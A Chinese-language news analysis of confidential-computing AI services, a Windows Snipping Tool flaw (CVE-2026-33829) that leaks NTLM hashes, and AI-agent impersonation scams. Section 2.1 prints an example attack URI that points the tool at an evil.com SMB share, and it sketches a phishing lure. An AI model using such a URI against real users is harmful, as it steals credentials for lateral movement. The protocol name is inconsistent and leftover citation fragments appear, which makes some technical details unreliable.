《机密计算破局政务金融、截图工具漏洞泄露NTLM哈希、智能体仿冒日增200+：AI安全的三场“攻防战”》

一、全链路机密计算破局：政务/金融敏感数据进入“可信推理”时代

当前，大模型落地过程中面临的核心矛盾在于：越是高价值的专业技术领域，其训练数据和实时推理数据的安全级别就越高。在政务场景中，政府规划、财政数据、内部决策草案是国家机密的核心组成部分；在金融领域，客户账单、交易记录、企业财报等，一旦泄露必然引发连锁反应与合规连环追责。

但企业既希望用最先进的AI模型辅助处理文档、分析风控，又害怕将自己的核心内部数据安全连同宝贵的商业秘密完全暴露给模型服务商。此前有限的密钥加密、数据匿名化等手段仍然存在数据明文暴露的风险窗——也就是说，AI推理的过程中，敏感数据仍然会在某一个时间点离开企业可控的信任域。显然，要让大模型从“科技圈的跑分引擎”真正变成社会核心业务流程的关键数字生产力，数据隐私存储问题无法再绕开。

传统的沙箱方案存在一个致命的弱点：算力和数据必须全部在一个孤岛中完成，导致训练和推理的效率很低，更难融入业务流程的大语言模型服务平台。而机密计算，恰恰在多个维度上克服了这个缺陷——通过TEE产生的基于硬件的隔空技术来保护隐私数据，确保在数据使用过程中也“数据看不见、流程可审计、访问可监控”，真正实现数据可用不可见。

1.1 “移动引擎机密模型服务”：首创机密推理新模式

5月8日，在苏州举行的2026移动云大会上，中国移动联合火山引擎正式发布“移动引擎机密模型服务”专区，这是国内首个从端到端实现AI全链路机密计算的商用服务。双方依托移动云的算力底座，在虚拟安全执行域之上构建安全可信的机密执行环境，使豆包大模型在推理过程中保持端到端加密，让整个推理过程的计算状态可追溯可审计；同时做到了零硬件投入，全托管免运维。

该服务已在第一时间上线了Seedance 2.0视频生成大模型——这个全球SOTA（State-of-the-Art）模型支持文字、图片、音频、视频四种模态输入，集成了目前业界最全面的多模态内容参考和编辑能力，在复杂交互和运动场景下的可用率更高。对于政务、金融等高安全场景而言，高效大模型受制于数据安全阈值的时代，迎来了一道真正的破局曙光。企业可以在不把核心数据明文暴露给模型服务商的前提下，充分享受Seedance 2.0的视频及多模态生成能力，同时也为政务行业大规模文档摘要、会议生成和企业私域知识库调用等各种应用铺平了安全合规的信任道路。

值得注意的是，火山引擎和中国移动的双方合力并非一时兴起。火山引擎副总裁赵文婕在大会上明确表示：“Token经济的繁荣，更需要生态的共建，既需要深度融入行业场景的产品与方案伙伴，也需要各类SaaS厂商和独立软件开发商。”后续双方还将集成HiAgent、Arkclaw等智能体开发平台，并逐步提供一系列开箱即用的行业智能体。算力筑基、模型使能、生态共赢，这次合作不仅是AI服务安全底座的突破，更是行业落地商业模式的探索——它使“愿意付费的高价值客户用最安全和智能的方式取得AI驱动业务的优势”成为一种可行且可复制的路径。

1.2 MoMA平台的承载与Token生态联盟的战略闭环

“移动引擎机密模型服务”并不是单独的服务，而是建在中国移动全线AI基础设施支撑之上的一个“安全舱”。中国移动此次同时发布了MoMA模型聚合平台，接入超300款主流国产模型，涵盖九天、豆包、DeepSeek、千问、MiniMax等各类优质开源与闭源模型。MoMA首创Token集约化运营模式，通过智能路由、模型联邦和缓存池化等技术创新，单位Token成本有望压降30%。而“移动引擎机密模型服务”恰好从安全侧正面呼应了MoMA平台“算力普惠、安全可信”的两条主线。

同时，中国移动联合阿里云、火山引擎、华为云等8家合作伙伴共同组建Token应用生态联盟，其更深远的意义在于——机密计算服务不再是一个孤立的商业产品，而是联盟推进“Token标准化、场景多元化、服务普惠化”三大目标的安全基座。在中国移动副总经理陈怀达看来，Token已成为新一代关键生产要素，而机密模型服务正是让Token生产要素的流转达到“既能交易、又不会泄露顶层机密”的核心工具。

1.3 “算力普惠”与“机密计算”的深层逻辑交汇

机密计算之所以重要，与AI产业当前的结构性张力有直接关系。大模型技术越是向企业和政府渗透，数据敏感度与算力服务商之间的信任缺困境就越是突出。最常规的做法是企业与在本地独立部署一套闭源模型——但算力成本、运维成本双高；推理性能受限；而且在面对未来不断迭代的主流模型时可能不兼容。机密计算提供了第三条路径：将数据置于受现代密码学保护的、与主机操作系统隔离的可信执行环境之内，即便服务商的运营人员也无法窥见推理内容。

在此趋势下，不只是中国移动和火山引擎在机密计算赛道加速布局。Google Cloud的机密VMs利用AMD SEV加密虚拟机内存和寄存器状态；AWS的Nitro Enclave在EC2实例内部构建出独立的、与主实例硬件级隔离的受信执行环境；微软Azure的机密计算基于Intel SGX（或下一代TDX）设计了“仅应用程序及授权代码可见”的安全原则。大模型推理数据的机密化，将是全球云服务商和AI安全方向的结构性驱动力，而中国移动与火山引擎的机密模型服务专区开启了这一重大征程的国内商用开端。

二、企业“感知”盲区敲警钟：一个意想不到的Windows截图工具高风险漏洞

如果说机密计算解决的是“大模型上公有云时数据如何不泄露”这一关键问题，那么Windows截图工具中潜伏的CVE-2026-33829就是一个彻头彻尾的“冰火两重天”式案例——它展现的是攻击面感知缺失导致普通员工最容易暴露企业的复杂身份验证的“另一个极值”。

2.1 一个URI字符串如何泄露企业全网的“万用钥匙”？

Windows的截图工具为了支持从浏览器等应用启动并截取某区域的图像，绑定了一个ms-screensketch的定制URL协议。当截图工具被调用时，可携带一个filePath参数远程打开一张图片。然而，问题就在于这一参数缺乏UNC路径校验——它允许攻击者构造类似ms-screenshottest:edit?filePath=\\evil.com\share\image.png的形式，强制截图工具主动访问远程的某台服务器。在这个过程中，受害者没有任何察觉，网络连接就已悄悄建立，Windows内核会向预设的远程攻击者服务器“自报家门”，交出用户的Net-NTLM哈希，即验证当前用户身份的口令响应。该漏洞于2026年4月14日的补丁星期二被修复，完整披露流程为：3月23日漏洞被上报至微软，4月14日微软同步发布补丁、公开漏洞细节及PoC利用代码。

为什么这个漏洞如此危险？

• 不需要用户点击弹窗提示或警告，截图工具在打开的过程中毫无征兆地步入了攻击者的圈套，NTLM认证过程全自动触发，用户无任何感知。

• 一旦黑客捕获了Net-NTLM哈希，可以离线破解或直接利用哈希在内部网络中实施NTLM中继攻击，伪造成受害者在域中任意横向移动，进而攻陷整个企业内网。

• 攻击者组合社会工程学可无限放大杀伤力：黑客注册一个类似snip-crp.com的域名，给员工发送一个看似无害的“请为我看一下这张报销截图是否符合公司标准”的链接。员工单击后，截图工具自动唤起，完全符合心理预期；而攻击者牢牢捕捉到了NTLM哈希，之后很快横向移动到域控服务器，瞬间接管内部系统中所有机密。

2.2 被忽视的“低级错误”为何能发生在现代操作系统？

CVE-2026-33829以CVSS 4.3度规中偏离较低的Base Score，让其最初被归类为“中危欺骗漏洞”。但这一评分体系显然无法反映一旦NTLM哈希进入攻击者手中后产生的“破坏潜力”——一场小小的哈希中继，可能引发的是一次全局性的内部权限失控。例如，Black Arrow安全研究团队发现该漏洞后在GitHub公开发布了PoC，这意味着从设备打满补丁前的那一刻起，攻击者的武器库中已陈列了一个可以被红队攻击反复利用的企业级实战工具。漏洞在影响Windows 10/11及Windows Server全系列版本下，几乎覆盖了大部分有组织的企业网络，企业无意间给攻击者敞开了内部数据的大门，而自己却毫无察觉。

2.3 “感知漂移”：AI时代企业安全计算的两个极端

如果我们把机密计算作为服务于AI数据安全的最强“盾牌”，那么截图工具哈希外泄案揭示的则是防御阵列中意想不到的一个“后方”作业暗角。很多企业安全运营团队花了大量精力在大流量监控、虚拟私有云安全组加固和代码漏洞扫描上，却对应用层中最不起眼、几乎已经“固化”存在的Windows功能如截图工具，完全丧失了攻击面疑心。攻击者开始寻找员工每天高频使用的系统组件——自带截图程序、文件搜索索引服务、内置剪贴板管理器等——在它们身上制造比0-day更高效、比APT更难以辨别的网络欺骗窗口。

企业安全的边界正在消融，不是在数据中心层，而是蔓延至每一个普通员工正常的电脑操作时刻。

三、数字化的“信任困境”：AI智能体仿冒潮与身份管理治理难题的矛盾

如果机密计算的定位是守护敏感数据在云端推理的安全与合规，而截图工具漏洞揭示的是企业内网攻防的细节盲区，那么AI智能体的野蛮仿冒现象则映射出了人工智能进入人机交互层之后的身份与内容失控问题。

3.1 80个“南方电网”背后：一个平台上演仿冒狂潮

记者对多个主流大模型平台进行了深度渗透实测，仅仅输入“南方电网”四个字，在单一平台检索出了超过80个相关智能体，这些仿冒账号覆盖了“电力业务办理”、“招聘咨询”、“内部培训”等大量精准服务名称，部分仿冒账号甚至直接用了南方电网官方Logo、并精修了组织架构话术。当用户向这个假客服询问业务操作流程时，可能会一步步被引导到钓鱼网站或者遭遇电信诈骗。

而南方电网并非孤例，政务、金融、通信等各类公共服务项目均出现类似的仿冒型批量AI智能体[13†L4-L8]。平台侧身份核对上的真空，叠加零门槛技术，对于普通用户，官方智能体和伪造假账号之间没有任何可区分的认知差异。中国信通院人工智能研究所安全治理部副主任陈文弢一针见血地指出：“智能体的仿冒相对于传统的钓鱼邮件或攻击方法，它的隐蔽性更强，也更难发现。”这些智能体不仅能通过交互式对话诱导和套取个人信息，还可以形成内部机器人网络，为后续跳板攻击批量造势。

3.2 根源性漏洞：零成本创建、弱身份核查、轻量化护栏，仿冒机制化

AI智能体之所以泛滥并迅速呈现仿冒化、产业链化，根源在于技术基础的“野蛮生长”与制度规则的滞后脱节。平台向用户默认提供零基础、可拖拽的“无代码智能体创建工具”，这让不法分子随时随地批量生产中模仿主体。AI软件生态链中，智能体创建不需要审批硬门槛，也无需提供实体企业绑定认证，几百或几千的账号可以利用脚本工具在秒级内批量完成，平台为抢夺创作者生态故意放宽审核标准也形成了系统级缺陷。随着Moltbook等平台“150万智能体，超50万假账号背书的”震动式自我暴雷，智能体仿冒已不再是边缘的安全擦边，而是针对整个社会信息秩序的系统性挑战。

3.3 防伪机制的补课时代：水印、身份认证与KYC技术需求井喷

针对此威胁，国内技术生态已在快速跟进。一方面，DeepSeek、通义千问等先进模型已在训练输出端内嵌数字水印，实现AI生成内容元数据可追溯；另一方面，智能体的身份认证体系升级已是刚需，部分行业头部机构开始试点智能体链式签名与MFA多因子访问控制。在更远的未来，智能体身份水印与完整性校验有望跟随后量子密码的时间窗口，被写入新一代合规准入标准中。从平台端审核严控、企业端品牌主动入驻监控，到个人端用户提高识别官方验证标识意识，网络空间综合治理力量亟待全链条破局。

四、商约与市场反响：一张AI安全与合规的全景图

从机密计算破局敏感业务上云，到Windows截图工具利用社会工程暴露企业内网NTLM身份明文，再到AI智能体行业仿冒治理困难，这三件事看似互不相关，但它们的内核都与“数字信任”的资产估值属性高度关联。

4.1 机密计算加速推进国产大模型行业的商业变现与市场化机遇

对政务和金融行业来说，部署机密计算式AI推理的实际作用在于：在财务规划、地方政府文件调用、银行贷款审批记录性分析等复杂的结构化文档审核链上，无需再审批外部数据安全稽核。只要大模型部署在移动引擎机密计算平台上，本地隐私数据便可直接用于AI处理，算力质量和数据安全的脱节顾虑瞬间被化解。

在商业化层面，当前大模型商业变现的核心障碍不是缺乏能力和客户，而是数据主权焦虑。“机密模型”的发布精确命中要害。这一模式可望在政务、金融等中高端行业催生出第一波“安全优先、数据控制权的业务KPI AI化改造”，为各大企业从传统IT系统转向AI原生架构踩下真正的“油门”。而具体承载该服务的“Token生态联盟”与MoMA平台，也必然联动吸引众多在AI安全加密和智能体协同赛道的公司进行能力聚合与产品共创。

4.2 截图漏洞的警示价值：加速企业安全策略向纵深防御回归

虽然CVE-2026-33829在攻击技术上没有太复杂的内核，却给企业信息安全负责人敲响了最响的警钟企业的攻击面不止在几千个虚拟机的一行代码逻辑，它可能潜伏在你最熟悉的7-zip、画图板、闹钟、通知中心等员工每天都在操作的内置应用里。

因此，严格实施：封禁对外SMB连接上拉黑445端口出站，软件更新强行全面推送到所有终端设备，并引入第三方安全辅助工具的“高敏感行为分析”机制，以发现截图工具被意外调用触发SMB外联等并不常见的异常指标。

4.3 AI智能体的信任危机：从安全和治理走向新身份体系

如果说机密计算和截图漏洞分别从AI上游的数据面安全、下游的终端侧攻击面，展示了两个结构性技术维度上的“安全纠偏”，那么对智能体的身份治理和合规管理，则代表了未来几年数字世界中“新型社会信用”和“内容秩序”。随着AI智能体将逐步接管电商导购、法律援助、医疗初筛等数十项信息交互场景，智能体对人格权、肖像权、财产的持续蚕食，将快速逼迫官方机构及头部企业加强各自品牌的AI水印与官方定义强化，建构以隐私计算、链上身份、一致化合规审计的底层安全。

（综合编写参考来源：相关官方新闻发布会/机构报告；2026移动云大会现场材料；微软4月安全公告；中国科学技术大学、中国信通院、360集团[9]、腾讯新闻[6]、火山引擎及阿里云产研公开信息与安全分析师报告等。本文数据更新于2026年5月。）